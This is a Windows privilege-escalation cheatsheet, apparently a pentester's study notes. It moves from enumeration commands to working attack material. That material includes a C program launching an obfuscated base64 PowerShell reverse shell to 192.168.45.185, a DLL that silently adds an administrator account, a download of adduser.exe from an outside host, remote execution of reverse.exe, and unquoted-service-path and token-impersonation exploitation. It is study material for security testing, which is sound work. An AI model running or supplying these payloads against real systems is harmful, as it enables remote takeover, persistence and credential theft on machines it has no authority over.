Windows PE Methodology

Windows - Privilege Escalation - Internal All The Thingsswisskyrepo.github.io

Information to Look Out for

Username and hostname
Group memberships of the current user
Existing users and groups
Operating system, version and architecture
Network information
Installed application
Running processes

User Information

Current User

whoami

Groups that the Current User is in

whoami /groups

User Privilege Token

Abusing Tokens - HackTricksHackTricks

Some Tokens that are not on the list:

SeManageVolumePrivilege ( SeManageVolumePrivilege)
SeMachineAccountPrivilege

whoami /priv

Obtain a list of all local users

Get-LocalUser

Obtain a list of all local group

Get-LocalGroup

net localgroup

Obtain a list of member in the Local Group

Get-LocalGroupMember <GROUP NAME>

System Information

Get system information

systeminfo

Get all network interfaces

ipconfig /all

Get routing table

route print

Display all active network connections

netstat -ano

Get all installed 32-bit applications

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*"

Get all installed 64-bit applications

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*"

Get all process that is currently running

Get-Process

Get-Process | Select ProcessName, Path

File Search in Machine

Search for file in Windows

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Searching for documents with specific extensions

Get-ChildItem -Path <PATH> -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.ini,*.kdbx -File -Recurse -ErrorAction SilentlyContinue

Command history

Obtain history of commands executed

Get-History

Obtain history of command executed recorded by PSReadline

(Get-PSReadlineOption).HistorySavePath

Runas command

runas /user:<username> cmd

Download files from external web server

Download File

iwr -uri http://192.168.45.211/adduser.exe -Outfile adduser.exe

Service binary Hijacking

List all services running

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Get the Access Control List (ACL)

icacls <PATH>

Get-ACL <PATH>

C Code Reverse Shell

#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=");
  
  return 0;
}

Compiling C Code

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

i686-w64-mingw32-gcc-win32 -std=c99 windows.c -o rsh.exe -lws2_32

Restarting Machine

shutdown /r /t 0

DLL Hijacking

Get PATH variable

$env:path

Get all the environment variable

dir env:

List all services running

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Procmon from Sysinternal Suite require administrator rights

DLL Code

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave2 password123! /add");
  	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

Compiling DLL

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Unquoted Service Path Attack

Finding Unquoted Service Path

wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService

Exploiting Unquoted Service Path

Using PowerUp.ps1,

Write-ServiceBinary -Name <SERVICE NAME> -Path <PATH TO INJECT>

Task Scheduler

List all scheduled tasks

schtasks /query /fo LIST /v

Service Commands

Start Service

Start-Service <SERVICE NAME>

Stop Service

Stop-Service <SERVICE NAME>

Restarting Service

Restart-Service <SERVICE NAME>

SeImpersonatePrivilege

Ensure that the user have this privilege enabled.

GitHub - antonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to SystemGitHub

GitHub - bugch3ck/SharpEfsPotato: Local privilege escalation from SeImpersonatePrivilege using EfsRpc.GitHub

GitHub - BeichenDream/GodPotatoGitHub

GitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the "Printer Bug"GitHub

Executing CMD commands using cmd as a command

cmd /c //192.168.45.185/test/reverse.exe
cmd /c <COMMAND>

Automated Tools

winPEAS (/usr/share/peass/winpeas/winPEASx64.exe)
Seatbelt (https://github.com/r3motecontrol/Ghostpack-CompiledBinaries)

Tools to check for PE vector

PowerUp.ps1 (/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1)

/tmp equivalent in Windows machine

C:\Windows\tasks

PowerShell writing to output

YOUR_COMMAND | Out-File -FilePath <PATH TO EXPORT FILE>

PreviousCheatsheet NextChecklist

Last updated 1 year ago

hashtagInformation to Look Out for

hashtagUser Information

hashtagCurrent User

hashtagGroups that the Current User is in

hashtagUser Privilege Token

hashtagObtain a list of all local users

hashtagObtain a list of all local group

hashtagObtain a list of member in the Local Group

hashtagSystem Information

hashtagGet system information

hashtagGet all network interfaces

hashtagGet routing table

hashtagDisplay all active network connections

hashtagGet all installed 32-bit applications

hashtagGet all installed 64-bit applications

hashtagGet all process that is currently running

hashtagFile Search in Machine

hashtagSearch for file in Windows

hashtagSearching for documents with specific extensions

hashtagCommand history

hashtagObtain history of commands executed

hashtagObtain history of command executed recorded by PSReadline

hashtagRunas command

hashtagDownload files from external web server

hashtagDownload File

hashtagService binary Hijacking

hashtagList all services running

hashtagGet the Access Control List (ACL)

hashtagC Code Reverse Shell

hashtagCompiling C Code

hashtagRestarting Machine

hashtagDLL Hijacking

hashtagGet PATH variable

hashtagGet all the environment variable

hashtagList all services running

hashtagDLL Code

hashtagCompiling DLL

hashtagUnquoted Service Path Attack

hashtagFinding Unquoted Service Path

hashtagExploiting Unquoted Service Path

hashtagTask Scheduler

hashtagList all scheduled tasks

hashtagService Commands

hashtagStart Service

hashtagStop Service

hashtagRestarting Service

hashtagSeImpersonatePrivilege

hashtagExecuting CMD commands using cmd as a command

hashtagAutomated Tools

hashtagTools to check for PE vector

hashtag/tmp equivalent in Windows machine

hashtagPowerShell writing to output

Information to Look Out for

User Information

Current User

Groups that the Current User is in

User Privilege Token

Obtain a list of all local users

Obtain a list of all local group

Obtain a list of member in the Local Group

System Information

Get system information

Get all network interfaces

Get routing table

Display all active network connections

Get all installed 32-bit applications

Get all installed 64-bit applications

Get all process that is currently running

File Search in Machine

Search for file in Windows

Searching for documents with specific extensions

Command history

Obtain history of commands executed

Obtain history of command executed recorded by PSReadline

Runas command

Download files from external web server

Download File

Service binary Hijacking

List all services running

Get the Access Control List (ACL)

C Code Reverse Shell

Compiling C Code

Restarting Machine

DLL Hijacking

Get PATH variable

Get all the environment variable

List all services running

DLL Code

Compiling DLL

Unquoted Service Path Attack

Finding Unquoted Service Path

Exploiting Unquoted Service Path

Task Scheduler

List all scheduled tasks

Service Commands

Start Service

Stop Service

Restarting Service

SeImpersonatePrivilege

Executing CMD commands using cmd as a command

Automated Tools

Tools to check for PE vector

/tmp equivalent in Windows machine

PowerShell writing to output